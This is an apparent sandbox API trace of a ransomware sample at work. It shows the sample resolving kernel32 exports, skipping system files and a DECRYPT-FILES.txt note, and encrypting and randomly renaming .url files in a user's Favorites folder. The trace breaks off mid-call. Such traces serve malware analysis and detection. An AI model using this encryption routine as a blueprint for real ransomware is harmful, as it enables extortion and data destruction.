[0085.105] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0085.105] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0085.105] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0085.105] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0085.105] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0085.105] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0085.105] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0085.105] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0085.105] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0085.105] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0085.105] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0085.105] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0085.105] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0085.105] lstrlenA (lpString="CREATETHREAD") returned 12 [0085.105] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0085.105] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0085.105] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0085.105] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0085.105] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0085.105] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0085.105] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0085.105] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0085.105] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0085.105] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0085.105] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0085.105] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0085.106] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0085.106] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0085.106] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0085.106] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0085.106] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0085.106] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0085.106] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0085.106] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0085.106] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0085.106] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0085.106] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0085.106] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0085.106] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0085.106] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0085.106] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0085.106] lstrlenA (lpString="CTRLROUTINE") returned 11 [0085.106] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0085.106] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0085.106] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0085.106] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0085.106] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0085.106] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0085.106] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0085.106] lstrlenA (lpString="DEBUGBREAK") returned 10 [0085.106] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0085.106] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0085.106] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0085.106] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0085.106] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0085.106] lstrlenA (lpString="DECODEPOINTER") returned 13 [0085.106] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0085.106] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0085.106] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0085.106] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0085.106] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0085.106] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0085.107] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0085.107] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0085.107] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0085.107] lstrlenA (lpString="DELETEATOM") returned 10 [0085.107] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0085.107] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0085.107] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0085.107] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0085.107] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0085.107] lstrlenA (lpString="DELETEFIBER") returned 11 [0085.107] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0085.107] lstrlenA (lpString="DELETEFILEA") returned 11 [0085.107] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0085.107] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0085.107] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0085.107] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0085.107] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0085.107] lstrlenA (lpString="DELETEFILEW") returned 11 [0085.107] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0085.107] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0085.107] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0085.107] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0085.107] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0085.107] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0085.107] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0085.107] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0085.107] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0085.107] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0085.107] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0085.107] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0085.107] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0085.107] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0085.107] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0085.107] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0085.107] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0085.107] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0085.107] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0085.107] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0085.108] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0085.108] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0085.108] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0085.108] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0085.108] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0085.108] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0085.108] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0085.108] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0085.108] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0085.108] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0085.108] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0085.108] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0085.108] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0085.108] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0085.108] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0085.108] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0085.108] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0085.108] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0085.108] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0085.108] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0085.108] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0085.108] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0085.108] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0085.108] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0085.108] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0085.108] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0085.108] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0085.108] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0085.108] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0085.108] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0085.108] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0085.108] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0085.108] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0085.108] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0085.108] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0085.108] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0085.108] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0085.109] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0085.109] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0085.109] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0085.109] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0085.109] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0085.109] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0085.109] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0085.109] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0085.109] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0085.109] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0085.109] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0085.109] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url") returned 66 [0085.109] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url.X72ftxu") returned 74 [0085.109] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url.X72ftxu" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url.x72ftxu"), dwFlags=0x0) returned 1 [0085.110] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.110] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.110] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.111] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSN Entertainment.url", cAlternateFileName="MSNENT~1.URL")) returned 1 [0085.111] lstrcmpiW (lpString1="MSN Entertainment.url", lpString2="DECRYPT-FILES.txt") returned 1 [0085.111] lstrcmpiW (lpString1="MSN Entertainment.url", lpString2="autorun.inf") returned 1 [0085.111] lstrcmpiW (lpString1="MSN Entertainment.url", lpString2="boot.ini") returned 1 [0085.111] lstrcmpiW (lpString1="MSN Entertainment.url", lpString2="desktop.ini") returned 1 [0085.111] lstrcmpiW (lpString1="MSN Entertainment.url", lpString2="ntuser.dat") returned -1 [0085.111] lstrcmpiW (lpString1="MSN Entertainment.url", lpString2="iconcache.db") returned 1 [0085.111] lstrcmpiW (lpString1="MSN Entertainment.url", lpString2="bootsect.bak") returned 1 [0085.111] lstrcmpiW (lpString1="MSN Entertainment.url", lpString2="ntuser.dat.log") returned -1 [0085.111] lstrcmpiW (lpString1="MSN Entertainment.url", lpString2="thumbs.db") returned -1 [0085.111] lstrcmpiW (lpString1="MSN Entertainment.url", lpString2="Bootfont.bin") returned 1 [0085.111] lstrlenW (lpString="MSN Entertainment.url") returned 21 [0085.111] lstrcmpiW (lpString1="url", lpString2="lnk") returned 1 [0085.111] lstrcmpiW (lpString1="url", lpString2="exe") returned 1 [0085.111] lstrcmpiW (lpString1="url", lpString2="sys") returned 1 [0085.111] lstrcmpiW (lpString1="url", lpString2="dll") returned 1 [0085.111] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned 53 [0085.111] lstrlenW (lpString="MSN Entertainment.url") returned 21 [0085.111] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" [0085.111] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpString2="MSN Entertainment.url" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url" [0085.111] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.112] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0085.113] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=133) returned 1 [0085.113] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0085.113] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0085.113] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0085.113] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0085.113] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0085.114] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0085.115] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0085.115] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.115] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0085.115] CloseHandle (hObject=0x42c) returned 1 [0085.116] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.116] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0085.116] CloseHandle (hObject=0x0) returned 0 [0085.116] CloseHandle (hObject=0x428) returned 1 [0085.116] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.117] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.117] GetTickCount () returned 0x114dbcf [0085.117] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.117] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0085.117] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0085.117] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0085.118] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0085.118] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url") returned 74 [0085.118] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url.8nOE") returned 79 [0085.118] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url.8nOE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url.8noe"), dwFlags=0x0) returned 1 [0085.119] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.119] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.119] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.119] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSN Money.url", cAlternateFileName="MSNMON~1.URL")) returned 1 [0085.119] lstrcmpiW (lpString1="MSN Money.url", lpString2="DECRYPT-FILES.txt") returned 1 [0085.119] lstrcmpiW (lpString1="MSN Money.url", lpString2="autorun.inf") returned 1 [0085.119] lstrcmpiW (lpString1="MSN Money.url", lpString2="boot.ini") returned 1 [0085.119] lstrcmpiW (lpString1="MSN Money.url", lpString2="desktop.ini") returned 1 [0085.119] lstrcmpiW (lpString1="MSN Money.url", lpString2="ntuser.dat") returned -1 [0085.119] lstrcmpiW (lpString1="MSN Money.url", lpString2="iconcache.db") returned 1 [0085.119] lstrcmpiW (lpString1="MSN Money.url", lpString2="bootsect.bak") returned 1 [0085.119] lstrcmpiW (lpString1="MSN Money.url", lpString2="ntuser.dat.log") returned -1 [0085.120] lstrcmpiW (lpString1="MSN Money.url", lpString2="thumbs.db") returned -1 [0085.120] lstrcmpiW (lpString1="MSN Money.url", lpString2="Bootfont.bin") returned 1 [0085.120] lstrlenW (lpString="MSN Money.url") returned 13 [0085.120] lstrcmpiW (lpString1="url", lpString2="lnk") returned 1 [0085.120] lstrcmpiW (lpString1="url", lpString2="exe") returned 1 [0085.120] lstrcmpiW (lpString1="url", lpString2="sys") returned 1 [0085.120] lstrcmpiW (lpString1="url", lpString2="dll") returned 1 [0085.120] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned 53 [0085.120] lstrlenW (lpString="MSN Money.url") returned 13 [0085.120] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" [0085.120] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpString2="MSN Money.url" | out: 